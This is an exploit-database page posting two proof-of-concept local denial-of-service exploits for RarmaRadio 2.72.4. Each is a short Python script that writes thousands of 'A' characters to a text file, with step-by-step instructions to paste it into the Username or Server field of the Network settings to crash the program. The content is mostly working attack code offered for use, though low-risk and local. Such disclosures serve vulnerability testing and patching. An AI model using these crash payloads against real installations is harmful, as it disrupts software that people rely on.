RarmaRadio 2.72.4 Denial Of Service

2020.02.07
Credit: chuyreds
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-02-05 # Vendor Homepage: http://www.raimersoft.com/rarmaradio.html # Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe # Tested Version: 2.72.4 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es #Steps to produce the crash: #1.- Run python code: rarmaradio_username.py #2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard #3.- Open RarmaRadio #4.- Select "Edit" > "Settings" > "Network" #5.- In "Username" field paste Clipboard #6.- Select "OK" #7.- Crashed buffer = "\x41" * 5000 f = open ("RarmaRadio2.72.4_username.txt", "w") f.write(buffer) f.close() # Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 05-02-2020 # Vendor Homepage: http://www.raimersoft.com/rarmaradio.html # Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe # Tested Version: 2.72.4 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: #1.- Run python code: RarmaRadio2.72.4_server.py #2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard #3.- Open RarmaRadio #4.- Select "Edit" > "Settings" > "Network" #5.- In "Server" field paste Clipboard #6.- Select "OK" #7.- Crashed buffer = "\x41" * 4000 f = open ("RarmaRadio2.72.4_server.txt", "w") f.write(buffer) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top